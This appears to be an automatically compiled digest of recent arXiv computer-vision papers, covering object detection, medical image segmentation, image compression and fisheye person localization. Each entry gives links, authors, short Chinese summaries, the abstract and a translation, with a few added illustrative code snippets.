    Abstract In Few-Shot Object Detection (FSOD), detecting small objects is extremely difficult. The limited supervision cripples the localization capabilities of the models and a few pixels shift can dramatically reduce the Intersection over Union (IoU) between the ground truth and predicted boxes for small objects. To this end, we propose Scale-adaptive Intersection over Union (SIoU), a novel box similarity measure. SIoU changes with the objects' size, it is more lenient with small object shifts. We conducted a user study and SIoU better aligns than IoU with human judgment. Employing SIoU as an evaluation criterion helps to build more user-oriented models. SIoU can also be used as a loss function to prioritize small objects during training, outperforming existing loss functions. SIoU improves small object detection in the non-few-shot regime, but this setting is unrealistic in the industry as annotated detection datasets are often too expensive to acquire. Hence, our experiments mainly focus on the few-shot regime to demonstrate the superiority and versatility of SIoU loss. SIoU improves significantly FSOD performance on small objects in both natural (Pascal VOC and COCO datasets) and aerial images (DOTA and DIOR). In aerial imagery, small objects are critical and SIoU loss achieves new state-of-the-art FSOD on DOTA and DIOR.
    摘要 在少样本目标检测（FSOD）中，检测小目标极其困难。有限的监督削弱了模型的定位能力，几个像素的偏移就可能使小目标的预测框与真实框之间的交并比（IoU）大幅下降。为此，我们提出了尺度自适应交并比（SIoU），一种新的边界框相似度度量。SIoU 随目标尺寸变化，对小目标的偏移更加宽容。我们进行了用户研究，发现 SIoU 比 IoU 更符合人类判断；将 SIoU 用作评价标准有助于构建更贴近用户需求的模型。SIoU 还可以作为损失函数，在训练中优先关注小目标，表现优于现有损失函数。SIoU 在非少样本设置下同样能改进小目标检测，但该设置在工业界并不现实，因为标注检测数据集通常过于昂贵。因此，我们的实验主要集中在少样本设置，以展示 SIoU 损失的优越性与通用性。SIoU 在自然图像（Pascal VOC 和 COCO）与航拍图像（DOTA 和 DIOR）上均显著提升了小目标的少样本检测性能；在小目标至关重要的航拍图像上，SIoU 损失在 DOTA 和 DIOR 上取得了新的最先进 FSOD 性能。
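The abstract does not give the exact SIoU formula, but the idea of a box-similarity measure that becomes more lenient as objects get smaller can be illustrated as follows: compute the standard IoU, then raise it to a power that shrinks with ground-truth area, so that a few-pixel shift on a small box is penalized less. This is an illustrative stand-in, not the paper's definition.

```python
import numpy as np

def iou(box_a, box_b):
    """Standard IoU for boxes given as (x1, y1, x2, y2)."""
    ix1, iy1 = max(box_a[0], box_b[0]), max(box_a[1], box_b[1])
    ix2, iy2 = min(box_a[2], box_b[2]), min(box_a[3], box_b[3])
    inter = max(0.0, ix2 - ix1) * max(0.0, iy2 - iy1)
    area_a = (box_a[2] - box_a[0]) * (box_a[3] - box_a[1])
    area_b = (box_b[2] - box_b[0]) * (box_b[3] - box_b[1])
    return inter / (area_a + area_b - inter + 1e-9)

def scale_adaptive_iou(pred, gt, small_area=32 * 32, min_power=0.5):
    """Toy scale-adaptive IoU: small ground-truth boxes get a power < 1, flattening the
    penalty for small shifts; large boxes keep roughly plain IoU."""
    area = (gt[2] - gt[0]) * (gt[3] - gt[1])
    power = min_power + (1.0 - min_power) * min(1.0, area / small_area)
    return iou(pred, gt) ** power

gt = (10, 10, 18, 18)          # an 8x8 "small" object
shifted = (12, 10, 20, 18)     # prediction shifted by 2 px
print(iou(shifted, gt), scale_adaptive_iou(shifted, gt))  # 0.60 vs ~0.76: SIoU is more lenient
```

Used as a loss (e.g. 1 - SIoU), such a measure keeps gradients informative for small objects instead of collapsing them after a tiny localization error.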

RCM-Fusion: Radar-Camera Multi-Level Fusion for 3D Object Detection

  • paper_url: http://arxiv.org/abs/2307.10249
  • repo_url: None
  • paper_authors: Jisong Kim, Minjae Seong, Geonho Bang, Dongsuk Kum, Jun Won Choi
  • for: 本研究旨在提出一种基于雷达和摄像头的多级融合方法(RCM-Fusion),以完全利用雷达信息并提高3D对象检测性能。
  • methods: 本方法在feature级和实例级进行了雷达和摄像头的多级融合,包括Radar Guided BEV Encoder和Radar Grid Point Refinement module。Radar Guided BEV Encoder利用雷达 Bird’s-Eye-View特征将图像特征转换为精确的BEV表示,然后适应性地组合了雷达和摄像头的BEV特征。Radar Grid Point Refinement模块通过考虑雷达点云特征来减少本地化错误。
  • results: 在公开的nuScenes数据集上进行的实验证明，我们提出的RCM-Fusion方法相比仅用摄像头的基线模型将nuScenes检测分数（NDS）提升了11.8%，并在nuScenes 3D目标检测基准中取得了雷达-摄像头融合方法中的最先进性能。
    Abstract While LiDAR sensors have been succesfully applied to 3D object detection, the affordability of radar and camera sensors has led to a growing interest in fusiong radars and cameras for 3D object detection. However, previous radar-camera fusion models have not been able to fully utilize radar information in that initial 3D proposals were generated based on the camera features only and the instance-level fusion is subsequently conducted. In this paper, we propose radar-camera multi-level fusion (RCM-Fusion), which fuses radar and camera modalities at both the feature-level and instance-level to fully utilize radar information. At the feature-level, we propose a Radar Guided BEV Encoder which utilizes radar Bird's-Eye-View (BEV) features to transform image features into precise BEV representations and then adaptively combines the radar and camera BEV features. At the instance-level, we propose a Radar Grid Point Refinement module that reduces localization error by considering the characteristics of the radar point clouds. The experiments conducted on the public nuScenes dataset demonstrate that our proposed RCM-Fusion offers 11.8% performance gain in nuScenes detection score (NDS) over the camera-only baseline model and achieves state-of-the-art performaces among radar-camera fusion methods in the nuScenes 3D object detection benchmark. Code will be made publicly available.
    摘要 虽然LiDAR传感器已成功应用于3D目标检测，但由于雷达和摄像头传感器成本低廉，融合雷达与摄像头进行3D目标检测的研究日益受到关注。然而，此前的雷达-摄像头融合模型未能充分利用雷达信息：初始3D候选框仅基于摄像头特征生成，随后才进行实例级融合。本文提出了雷达-摄像头多级融合（RCM-Fusion），在特征级和实例级同时融合雷达与摄像头模态，以充分利用雷达信息。在特征级，我们提出了雷达引导的BEV编码器，利用雷达鸟瞰图（BEV）特征将图像特征转换为精确的BEV表示，并自适应地融合雷达与摄像头的BEV特征。在实例级，我们提出了雷达栅格点精炼模块，通过考虑雷达点云的特性来减小定位误差。在公开的nuScenes数据集上的实验表明，所提出的RCM-Fusion相比仅用摄像头的基线模型将nuScenes检测分数（NDS）提升了11.8%，并在nuScenes 3D目标检测基准中取得了雷达-摄像头融合方法中的最先进性能。代码将公开发布。

Combiner and HyperCombiner Networks: Rules to Combine Multimodality MR Images for Prostate Cancer Localisation

  • paper_url: http://arxiv.org/abs/2307.08279
  • repo_url: None
  • paper_authors: Wen Yan, Bernard Chiu, Ziyi Shen, Qianye Yang, Tom Syer, Zhe Min, Shonit Punwani, Mark Emberton, David Atkinson, Dean C. Barratt, Yipeng Hu
  • for: 该研究旨在按照PI-RADS v2.1报告系统，基于多参数MR扫描图像评估临床显著前列腺癌的风险。
  • methods: 该研究使用低维参数模型对PI-RADS决策规则进行建模，并提出HyperCombiner网络来训练单一的图像分割网络，使其在推理时以模态组合权重为条件。
  • results: 基于850名患者数据的实验结果表明，所提出的Combiner网络在提升效率的同时，能够获得并解释各图像模态上的线性权重或优势比，支持模态可用性评估、重要性量化和规则发现等临床应用。
    Abstract One of the distinct characteristics in radiologists' reading of multiparametric prostate MR scans, using reporting systems such as PI-RADS v2.1, is to score individual types of MR modalities, T2-weighted, diffusion-weighted, and dynamic contrast-enhanced, and then combine these image-modality-specific scores using standardised decision rules to predict the likelihood of clinically significant cancer. This work aims to demonstrate that it is feasible for low-dimensional parametric models to model such decision rules in the proposed Combiner networks, without compromising the accuracy of predicting radiologic labels: First, it is shown that either a linear mixture model or a nonlinear stacking model is sufficient to model PI-RADS decision rules for localising prostate cancer. Second, parameters of these (generalised) linear models are proposed as hyperparameters, to weigh multiple networks that independently represent individual image modalities in the Combiner network training, as opposed to end-to-end modality ensemble. A HyperCombiner network is developed to train a single image segmentation network that can be conditioned on these hyperparameters during inference, for much improved efficiency. Experimental results based on data from 850 patients, for the application of automating radiologist labelling multi-parametric MR, compare the proposed combiner networks with other commonly-adopted end-to-end networks. Using the added advantages of obtaining and interpreting the modality combining rules, in terms of the linear weights or odds-ratios on individual image modalities, three clinical applications are presented for prostate cancer segmentation, including modality availability assessment, importance quantification and rule discovery.
    摘要 放射科医生在使用PI-RADS v2.1等报告系统阅读多参数前列腺MR扫描时的一个显著特点是：先分别对T2加权、扩散加权和动态对比增强等各类MR模态打分，然后按照标准化的决策规则将这些模态特定的分数组合起来，以预测临床显著前列腺癌的可能性。本工作旨在证明，低维参数模型可以在所提出的Combiner网络中对这类决策规则进行建模，而不损失预测放射学标签的准确性。首先，我们证明线性混合模型或非线性堆叠模型足以对用于前列腺癌定位的PI-RADS决策规则建模。其次，我们将这些（广义）线性模型的参数作为超参数，用以加权Combiner网络训练中分别表示各图像模态的多个网络，而非采用端到端的模态集成。我们进一步构建了HyperCombiner网络，训练单个图像分割网络，使其在推理时可以以这些超参数为条件，从而大幅提升效率。基于850名患者数据、面向多参数MR放射科标注自动化的实验，将所提出的Combiner网络与其他常用的端到端网络进行了比较。借助可获得且可解释的模态组合规则（即各图像模态上的线性权重或优势比），我们展示了前列腺癌分割的三项临床应用，包括模态可用性评估、重要性量化和规则发现。
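The decision-rule modelling described above — combining per-modality predictions with a low-dimensional (generalised) linear model whose coefficients act as hyperparameters — can be sketched in a few lines. The weights and the logistic form below are illustrative, not the fitted PI-RADS rules from the paper.

```python
import numpy as np

def combine_modalities(prob_maps, weights, bias=0.0):
    """Linear mixture of per-modality cancer-probability maps in logit space.

    prob_maps: dict of modality name -> (H, W) probability map from a per-modality network.
    weights:   dict of modality name -> scalar weight (a hyperparameter of the Combiner).
    Returns a combined probability map; exp(weight) can be read as an odds-ratio
    attached to that modality when working in logit space.
    """
    logit = lambda p: np.log(p / (1.0 - p + 1e-9) + 1e-9)
    combined = bias + sum(w * logit(prob_maps[m]) for m, w in weights.items())
    return 1.0 / (1.0 + np.exp(-combined))

h = w = 4
prob_maps = {"T2w": np.full((h, w), 0.7),
             "DWI": np.full((h, w), 0.6),
             "DCE": np.full((h, w), 0.4)}
weights = {"T2w": 1.0, "DWI": 1.5, "DCE": 0.5}   # hypothetical modality importances
print(combine_modalities(prob_maps, weights))
```

Treating the weights as conditioning inputs rather than fixed constants is what lets a single hyper-network cover many combining rules (including dropping a missing modality by setting its weight to zero).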

Adversarial Attacks on Traffic Sign Recognition: A Survey

  • paper_url: http://arxiv.org/abs/2307.08278
  • repo_url: None
  • paper_authors: Svetlana Pavlitska, Nico Lambing, J. Marius Zöllner
  • for: 这篇论文关注自动驾驶车辆视觉系统中的交通标志识别，以及承担该任务的深度神经网络（DNN）模型所面临的对抗攻击问题。
  • methods: 该论文主要采用了现有的深度神经网络(DNNs)进行交通标志识别和分类,并对这些模型进行了数字和实际攻击。
  • results: 该论文提供了现有的攻击研究的概述,并指出了需要进一步研究的领域。
    Abstract Traffic sign recognition is an essential component of perception in autonomous vehicles, which is currently performed almost exclusively with deep neural networks (DNNs). However, DNNs are known to be vulnerable to adversarial attacks. Several previous works have demonstrated the feasibility of adversarial attacks on traffic sign recognition models. Traffic signs are particularly promising for adversarial attack research due to the ease of performing real-world attacks using printed signs or stickers. In this work, we survey existing works performing either digital or real-world attacks on traffic sign detection and classification models. We provide an overview of the latest advancements and highlight the existing research areas that require further investigation.
    摘要 交通标志识别是自动驾驶车辆感知系统的重要组成部分，目前几乎完全依靠深度神经网络（DNN）实现。然而，DNN 已知容易受到对抗攻击，此前已有多项工作证明了对交通标志识别模型实施对抗攻击的可行性。由于可以借助打印的标志或贴纸轻松实施真实世界攻击，交通标志成为对抗攻击研究中特别有价值的对象。本文综述了针对交通标志检测与分类模型的数字攻击和真实世界攻击的已有工作，概述了最新进展，并指出了仍需进一步研究的方向。

Liver Tumor Screening and Diagnosis in CT with Pixel-Lesion-Patient Network

  • paper_url: http://arxiv.org/abs/2307.08268
  • repo_url: None
  • paper_authors: Ke Yan, Xiaoli Yin, Yingda Xia, Fakai Wang, Shu Wang, Yuan Gao, Jiawen Yao, Chunli Li, Xiaoyu Bai, Jingren Zhou, Ling Zhang, Le Lu, Yu Shi
  • for: liver tumor segmentation and classification in non-contrast and dynamic contrast-enhanced CT images
  • methods: mask transformer with improved anchor queries and foreground-enhanced sampling loss, and an image-wise classifier to aggregate global information
  • results: high accuracy in tumor screening and lesion segmentation, and on par with a senior human radiologist in a reader study
    Abstract Liver tumor segmentation and classification are important tasks in computer aided diagnosis. We aim to address three problems: liver tumor screening and preliminary diagnosis in non-contrast computed tomography (CT), and differential diagnosis in dynamic contrast-enhanced CT. A novel framework named Pixel-Lesion-pAtient Network (PLAN) is proposed. It uses a mask transformer to jointly segment and classify each lesion with improved anchor queries and a foreground-enhanced sampling loss. It also has an image-wise classifier to effectively aggregate global information and predict patient-level diagnosis. A large-scale multi-phase dataset is collected containing 939 tumor patients and 810 normal subjects. 4010 tumor instances of eight types are extensively annotated. On the non-contrast tumor screening task, PLAN achieves 95% and 96% in patient-level sensitivity and specificity. On contrast-enhanced CT, our lesion-level detection precision, recall, and classification accuracy are 92%, 89%, and 86%, outperforming widely used CNN and transformers for lesion segmentation. We also conduct a reader study on a holdout set of 250 cases. PLAN is on par with a senior human radiologist, showing the clinical significance of our results.
    摘要 肝脏肿瘤的分割与分类是计算机辅助诊断中的重要任务。我们旨在解决三个问题：在平扫（非增强）CT中进行肝脏肿瘤筛查和初步诊断，以及在动态对比增强CT中进行鉴别诊断。我们提出了一个名为Pixel-Lesion-pAtient Network（PLAN）的新框架。它使用掩码Transformer，借助改进的锚查询和前景增强采样损失，对每个病灶同时进行分割和分类；同时包含一个图像级分类器，用于有效聚合全局信息并预测患者级诊断。我们收集了一个大规模多期数据集，包含939名肿瘤患者和810名正常受试者，并对八种类型共4010个肿瘤实例进行了详尽标注。在平扫CT肿瘤筛查任务上，PLAN的患者级敏感性和特异性分别达到95%和96%。在对比增强CT上，病灶级检测精确率、召回率和分类准确率分别为92%、89%和86%，优于广泛使用的CNN和Transformer病灶分割方法。我们还在250例留出集上进行了阅片者研究，PLAN的表现与资深放射科医生相当，显示了我们结果的临床意义。

Extreme Image Compression using Fine-tuned VQGAN Models

  • paper_url: http://arxiv.org/abs/2307.08265
  • repo_url: None
  • paper_authors: Qi Mao, Tinghan Yang, Yinuo Zhang, Shuyin Pan, Meng Wang, Shiqi Wang, Siwei Ma
  • for: 提高压缩数据的感知质量,特别是在低比特率下。
  • methods: 引入基于向量量化（VQ）的生成模型，将图像表示为VQ索引。
  • results: 提出了一种简单而有效的编码框架，可在极低比特率下保持图像重建质量；通过对大规模码本进行聚类，图像可以用不同粒度的VQ索引图表示，从而实现可变比特率和不同水平的重建质量。
    Abstract Recent advances in generative compression methods have demonstrated remarkable progress in enhancing the perceptual quality of compressed data, especially in scenarios with low bitrates. Nevertheless, their efficacy and applicability in achieving extreme compression ratios ($<0.1$ bpp) still remain constrained. In this work, we propose a simple yet effective coding framework by introducing vector quantization (VQ)-based generative models into the image compression domain. The main insight is that the codebook learned by the VQGAN model yields strong expressive capacity, facilitating efficient compression of continuous information in the latent space while maintaining reconstruction quality. Specifically, an image can be represented as VQ-indices by finding the nearest codeword, which can be encoded using lossless compression methods into bitstreams. We then propose clustering a pre-trained large-scale codebook into smaller codebooks using the K-means algorithm. This enables images to be represented as diverse ranges of VQ-indices maps, resulting in variable bitrates and different levels of reconstruction quality. Extensive qualitative and quantitative experiments on various datasets demonstrate that the proposed framework outperforms the state-of-the-art codecs in terms of perceptual quality-oriented metrics and human perception under extremely low bitrates.
    摘要 Recent advances in generative compression have markedly improved the perceptual quality of compressed data at low bitrates, yet extreme compression ratios (below 0.1 bpp) remain difficult. This work introduces a simple yet effective coding framework that brings vector quantization (VQ)-based generative models into image compression. The main idea is to use the codebook learned by the VQGAN model to efficiently compress continuous information in the latent space while maintaining reconstruction quality: an image is represented as VQ-indices by finding the nearest codeword for each latent vector, and these indices are losslessly encoded into bitstreams. To further improve the efficiency of the framework, a pre-trained large-scale codebook is clustered into smaller codebooks using the K-means algorithm, so that images can be represented by VQ-index maps of different granularities, yielding variable bitrates and different levels of reconstruction quality. Extensive experiments on various datasets show that the proposed framework outperforms state-of-the-art codecs in terms of perceptual quality-oriented metrics and human perception under extremely low bitrates.
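A schematic of the two ingredients described above — representing latents as nearest-codeword indices, and K-means clustering a large codebook into a smaller one for lower bitrates — using random arrays in place of a real VQGAN encoder; the codebook sizes and shapes are arbitrary here.

```python
import numpy as np

def nearest_indices(latents, codebook):
    """Map each latent vector to the index of its nearest codeword (L2 distance)."""
    d = ((latents[:, None, :] - codebook[None, :, :]) ** 2).sum(-1)   # (N, K)
    return d.argmin(axis=1)

def kmeans_codebook(codebook, k, iters=20, seed=0):
    """Cluster a large codebook into k centroids -> a smaller, lower-bitrate codebook."""
    rng = np.random.default_rng(seed)
    centers = codebook[rng.choice(len(codebook), k, replace=False)]
    for _ in range(iters):
        assign = nearest_indices(codebook, centers)
        for j in range(k):
            if np.any(assign == j):
                centers[j] = codebook[assign == j].mean(axis=0)
    return centers

rng = np.random.default_rng(1)
codebook = rng.normal(size=(1024, 16))     # stand-in for a pre-trained VQGAN codebook
latents = rng.normal(size=(16 * 16, 16))   # stand-in for the encoder output of one image

full_idx = nearest_indices(latents, codebook)    # log2(1024) = 10 bits per index
small = kmeans_codebook(codebook, k=64)
small_idx = nearest_indices(latents, small)      # log2(64)   =  6 bits per index
print(full_idx.max(), small_idx.max())
```

Switching between the full codebook and the clustered one changes the per-index bit budget, which is where the variable-bitrate behaviour comes from; the index maps themselves would then be entropy-coded losslessly.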

Hierarchical Spatiotemporal Transformers for Video Object Segmentation

  • paper_url: http://arxiv.org/abs/2307.08263
  • repo_url: None
  • paper_authors: Jun-Sang Yoo, Hongjae Lee, Seung-Won Jung
  • for: 这篇论文提出了一个新的框架 HST，用于半监督视频对象分割（VOS）。
  • methods: 使用最新的 Swin Transformer 和 Video Swin Transformer 提取图像和视频特征，并分别将其作为查询（query）和记忆（memory），通过多尺度的高效记忆读取操作生成层级特征，以精确重建对象掩码。
  • results: HST 在处理杂乱背景下被遮挡和快速运动的物体时表现出色，并在多个知名基准上超越此前的竞争方法。具体而言，HST-B 在 YouTube-VOS（85.0%）、DAVIS 2017（85.9%）和 DAVIS 2016（94.0%）上均优于此前的先进方法。
    Abstract This paper presents a novel framework called HST for semi-supervised video object segmentation (VOS). HST extracts image and video features using the latest Swin Transformer and Video Swin Transformer to inherit their inductive bias for the spatiotemporal locality, which is essential for temporally coherent VOS. To take full advantage of the image and video features, HST casts image and video features as a query and memory, respectively. By applying efficient memory read operations at multiple scales, HST produces hierarchical features for the precise reconstruction of object masks. HST shows effectiveness and robustness in handling challenging scenarios with occluded and fast-moving objects under cluttered backgrounds. In particular, HST-B outperforms the state-of-the-art competitors on multiple popular benchmarks, i.e., YouTube-VOS (85.0%), DAVIS 2017 (85.9%), and DAVIS 2016 (94.0%).
    摘要 本文提出了一个名为HST的新框架，用于半监督视频对象分割（VOS）。HST使用最新的Swin Transformer和Video Swin Transformer提取图像和视频特征，以继承其对时空局部性的归纳偏置，这对保持时间一致的VOS至关重要。为充分利用图像和视频特征，HST将图像特征和视频特征分别作为查询和记忆，并通过多尺度的高效记忆读取操作生成层级特征，从而精确重建对象掩码。HST在杂乱背景下处理被遮挡和快速运动物体等困难场景时表现出有效性和鲁棒性。特别地，HST-B在多个常用基准上超越了当前最先进的方法，包括YouTube-VOS（85.0%）、DAVIS 2017（85.9%）和DAVIS 2016（94.0%）。

Large-Scale Person Detection and Localization using Overhead Fisheye Cameras

  • paper_url: http://arxiv.org/abs/2307.08252
  • repo_url: None
  • paper_authors: Lu Yang, Liulei Li, Xueshi Xin, Yifan Sun, Qing Song, Wenguan Wang
  • for: 本研究旨在提供一种基于顶视鱼眼相机的人员检测与定位方法，以满足日常生活中的多种应用需求。
  • methods: 该方法构建了鱼眼人体检测网络，利用鱼眼畸变的旋转等变性设计训练策略，端到端预测径向对齐的人体框，并结合鱼眼成像模型与相机高度数据，通过数值求解计算人员的实际位置。
  • results: 实验结果表明，与此前方法相比，我们的鱼眼人体检测器具有优越性，并且整个鱼眼定位方案可以在0.1秒内以0.5米的精度定位视场内的所有人员。
    Abstract Location determination finds wide applications in daily life. Instead of existing efforts devoted to localizing tourist photos captured by perspective cameras, in this article, we focus on devising person positioning solutions using overhead fisheye cameras. Such solutions are advantageous in large field of view (FOV), low cost, anti-occlusion, and unaggressive work mode (without the necessity of cameras carried by persons). However, related studies are quite scarce, due to the paucity of data. To stimulate research in this exciting area, we present LOAF, the first large-scale overhead fisheye dataset for person detection and localization. LOAF is built with many essential features, e.g., i) the data cover abundant diversities in scenes, human pose, density, and location; ii) it contains currently the largest number of annotated pedestrian, i.e., 457K bounding boxes with groundtruth location information; iii) the body-boxes are labeled as radius-aligned so as to fully address the positioning challenge. To approach localization, we build a fisheye person detection network, which exploits the fisheye distortions by a rotation-equivariant training strategy and predict radius-aligned human boxes end-to-end. Then, the actual locations of the detected persons are calculated by a numerical solution on the fisheye model and camera altitude data. Extensive experiments on LOAF validate the superiority of our fisheye detector w.r.t. previous methods, and show that our whole fisheye positioning solution is able to locate all persons in FOV with an accuracy of 0.5 m, within 0.1 s.
    摘要 Location determination has numerous applications in daily life. Instead of previous efforts focused on localizing tourist photos captured by perspective cameras, this article focuses on developing person positioning solutions using overhead fisheye cameras. These solutions have several advantages, including a large field of view (FOV), low cost, resistance to occlusion, and a non-intrusive work mode (without the need for cameras carried by individuals). However, there is a lack of related studies due to the scarcity of data. To promote research in this exciting area, we present LOAF, the first large-scale overhead fisheye dataset for person detection and localization. LOAF features several essential aspects, including:1. Diverse scenes, human poses, densities, and locations are covered in the data.2. It contains the largest number of annotated pedestrians, with 457,000 bounding boxes and ground truth location information.3. The body boxes are labeled as radius-aligned to fully address the positioning challenge.To perform localization, we develop a fisheye person detection network that leverages fisheye distortions using a rotation-equivariant training strategy. The network predicts radius-aligned human boxes end-to-end. Then, the actual locations of the detected persons are calculated using a numerical solution on the fisheye model and camera altitude data. Extensive experiments on LOAF demonstrate the superiority of our fisheye detector compared to previous methods, and show that our entire fisheye positioning solution can accurately locate all persons in the FOV within 0.5 meters and within 0.1 seconds.

Random Boxes Are Open-world Object Detectors

  • paper_url: http://arxiv.org/abs/2307.08249
  • repo_url: https://github.com/scuwyh2000/randbox
  • paper_authors: Yanghao Wang, Zhongqi Yue, Xian-Sheng Hua, Hanwang Zhang
  • for: 本文旨在提出一种基于随机区域提议的开放世界目标检测（OWOD）方法，在保持已知目标检测精度的同时提高未知目标的召回率。
  • methods: 提出的RandBox架构基于Fast R-CNN，在每个训练迭代中使用随机生成的区域提议进行训练，借助随机性增强模型对未知目标的泛化能力，性能超越现有基于Faster R-CNN和Transformer的OWOD方法。
  • results: 在 Pascal-VOC/MS-COCO 和 LVIS 两个基准上的评估表明，RandBox 在所有指标上显著超越此前的最先进方法。代码可在 https://github.com/scuwyh2000/RandBox 获取。
    Abstract We show that classifiers trained with random region proposals achieve state-of-the-art Open-world Object Detection (OWOD): they can not only maintain the accuracy of the known objects (w/ training labels), but also considerably improve the recall of unknown ones (w/o training labels). Specifically, we propose RandBox, a Fast R-CNN based architecture trained on random proposals at each training iteration, surpassing existing Faster R-CNN and Transformer based OWOD. Its effectiveness stems from the following two benefits introduced by randomness. First, as the randomization is independent of the distribution of the limited known objects, the random proposals become the instrumental variable that prevents the training from being confounded by the known objects. Second, the unbiased training encourages more proposal explorations by using our proposed matching score that does not penalize the random proposals whose prediction scores do not match the known objects. On two benchmarks: Pascal-VOC/MS-COCO and LVIS, RandBox significantly outperforms the previous state-of-the-art in all metrics. We also detail the ablations on randomization and loss designs. Codes are available at https://github.com/scuwyh2000/RandBox.
    摘要 We show that classifiers trained with random region proposals achieve state-of-the-art open-world object detection (OWOD): they maintain accuracy on the known objects (with training labels) while considerably improving the recall of unknown ones (without training labels). The proposed RandBox, a Fast R-CNN based architecture trained on random proposals at each iteration, surpasses existing Faster R-CNN and Transformer based OWOD methods. Its effectiveness stems from two benefits introduced by randomness: (1) the randomization is independent of the distribution of the limited known objects, so the random proposals act as an instrumental variable that prevents training from being confounded by the known objects; (2) the unbiased training encourages more proposal exploration via a matching score that does not penalize random proposals whose prediction scores do not match the known objects. On Pascal-VOC/MS-COCO and LVIS, RandBox significantly outperforms the previous state-of-the-art in all metrics, and ablation studies on the randomization and loss designs are provided. Code is available at https://github.com/scuwyh2000/RandBox.
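The random-proposal idea — drawing fresh region proposals at every training iteration instead of relying only on a learned proposal network — can be sketched as below; the box parameterization and counts are arbitrary choices for illustration, not the paper's sampling scheme.

```python
import torch

def sample_random_proposals(num_boxes: int, img_h: int, img_w: int) -> torch.Tensor:
    """Draw axis-aligned boxes (x1, y1, x2, y2) uniformly inside the image.

    Because the sampling ignores where the labeled (known) objects are, the proposals
    also cover regions that may contain unknown objects.
    """
    cx = torch.rand(num_boxes) * img_w
    cy = torch.rand(num_boxes) * img_h
    w = torch.rand(num_boxes) * img_w
    h = torch.rand(num_boxes) * img_h
    boxes = torch.stack([cx - w / 2, cy - h / 2, cx + w / 2, cy + h / 2], dim=1)
    boxes[:, 0::2] = boxes[:, 0::2].clamp(0, img_w)
    boxes[:, 1::2] = boxes[:, 1::2].clamp(0, img_h)
    return boxes

proposals = sample_random_proposals(500, img_h=480, img_w=640)
# These would be fed to the RoI head at each training iteration in place of RPN outputs.
print(proposals.shape)  # torch.Size([500, 4])
```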

Uncertainty-aware State Space Transformer for Egocentric 3D Hand Trajectory Forecasting

  • paper_url: http://arxiv.org/abs/2307.08243
  • repo_url: None
  • paper_authors: Wentao Bao, Lele Chen, Libing Zeng, Zhong Li, Yi Xu, Junsong Yuan, Yu Kong
  • for: 从第一人称视角预测手部轨迹，以便在与AR/VR系统交互时快速理解人类意图。
  • methods: 提出了基于第一人称RGB视频的三维手部轨迹预测任务，设计了不确定性感知的状态空间Transformer（USST），并可进一步通过速度约束和视觉提示调优（VPT）加以增强。
  • results: 在H2O和EgoPAT3D数据集上的实验验证了USST的优越性，其在二维和三维轨迹预测上均优于对比方法。代码和数据集已在GitHub公开：https://github.com/Cogito2012/USST
    Abstract Hand trajectory forecasting from egocentric views is crucial for enabling a prompt understanding of human intentions when interacting with AR/VR systems. However, existing methods handle this problem in a 2D image space which is inadequate for 3D real-world applications. In this paper, we set up an egocentric 3D hand trajectory forecasting task that aims to predict hand trajectories in a 3D space from early observed RGB videos in a first-person view. To fulfill this goal, we propose an uncertainty-aware state space Transformer (USST) that takes the merits of the attention mechanism and aleatoric uncertainty within the framework of the classical state-space model. The model can be further enhanced by the velocity constraint and visual prompt tuning (VPT) on large vision transformers. Moreover, we develop an annotation workflow to collect 3D hand trajectories with high quality. Experimental results on H2O and EgoPAT3D datasets demonstrate the superiority of USST for both 2D and 3D trajectory forecasting. The code and datasets are publicly released: https://github.com/Cogito2012/USST.
    摘要 从第一人称视角预测手部轨迹，是在与AR/VR系统交互时快速理解人类意图的关键。然而，现有方法在二维图像空间中处理该问题，难以满足三维真实世界应用的需求。在本文中，我们设立了一个第一人称三维手部轨迹预测任务，旨在根据早期观察到的第一人称RGB视频预测三维空间中的手部轨迹。为实现这一目标，我们提出了一种不确定性感知的状态空间Transformer（USST），它在经典状态空间模型的框架内融合了注意力机制与偶然（aleatoric）不确定性。该模型还可以通过速度约束以及在大型视觉Transformer上进行视觉提示调优（VPT）进一步增强。此外，我们还设计了一套标注流程，以采集高质量的三维手部轨迹。在H2O和EgoPAT3D数据集上的实验结果表明，USST在二维和三维轨迹预测上均具有优越性。代码与数据集已公开发布：https://github.com/Cogito2012/USST。

Unified Open-Vocabulary Dense Visual Prediction

  • paper_url: http://arxiv.org/abs/2307.08238
  • repo_url: None
  • paper_authors: Hengcan Shi, Munawar Hayat, Jianfei Cai
  • for: 这篇论文旨在提出一种统一的开放词汇网络（UOVN），以联合处理四种常见的稠密预测任务。
  • methods: 论文提出了多模态、多尺度、多任务（MMM）解码机制，以更好地利用多模态数据；此外还提出了相应的UOVN训练机制，以缩小不同任务和领域之间的差距。
  • results: 实验结果表明,UOVN 可以有效地 Address four datasets 上的 dense prediction 任务。
    Abstract In recent years, open-vocabulary (OV) dense visual prediction (such as OV object detection, semantic, instance and panoptic segmentations) has attracted increasing research attention. However, most of existing approaches are task-specific and individually tackle each task. In this paper, we propose a Unified Open-Vocabulary Network (UOVN) to jointly address four common dense prediction tasks. Compared with separate models, a unified network is more desirable for diverse industrial applications. Moreover, OV dense prediction training data is relatively less. Separate networks can only leverage task-relevant training data, while a unified approach can integrate diverse training data to boost individual tasks. We address two major challenges in unified OV prediction. Firstly, unlike unified methods for fixed-set predictions, OV networks are usually trained with multi-modal data. Therefore, we propose a multi-modal, multi-scale and multi-task (MMM) decoding mechanism to better leverage multi-modal data. Secondly, because UOVN uses data from different tasks for training, there are significant domain and task gaps. We present a UOVN training mechanism to reduce such gaps. Experiments on four datasets demonstrate the effectiveness of our UOVN.
    摘要 近年来，开放词汇（OV）稠密视觉预测（如OV目标检测、语义分割、实例分割和全景分割）受到越来越多的研究关注。然而，现有方法大多针对单一任务，各自独立处理。本文提出统一开放词汇网络（UOVN），联合处理四种常见的稠密预测任务。相比各自独立的模型，统一网络更适合多样的工业应用；此外，OV稠密预测的训练数据相对较少，独立网络只能利用与各自任务相关的训练数据，而统一方法可以整合多样的训练数据来提升各个任务。我们解决了统一OV预测中的两大挑战：其一，与面向固定类别集的统一方法不同，OV网络通常使用多模态数据训练，因此我们提出了多模态、多尺度、多任务（MMM）解码机制，以更好地利用多模态数据；其二，由于UOVN使用来自不同任务的数据进行训练，存在显著的领域差距和任务差距，我们提出了相应的UOVN训练机制来缩小这些差距。在四个数据集上的实验验证了UOVN的有效性。

Video Frame Interpolation with Stereo Event and Intensity Camera

  • paper_url: http://arxiv.org/abs/2307.08228
  • repo_url: None
  • paper_authors: Chao Ding, Mingyuan Lin, Haijian Zhang, Jianzhuang Liu, Lei Yu
  • for: 解决基于事件的视频帧插值（E-VFI）中难以消除的跨模态视差问题，提升插帧性能。
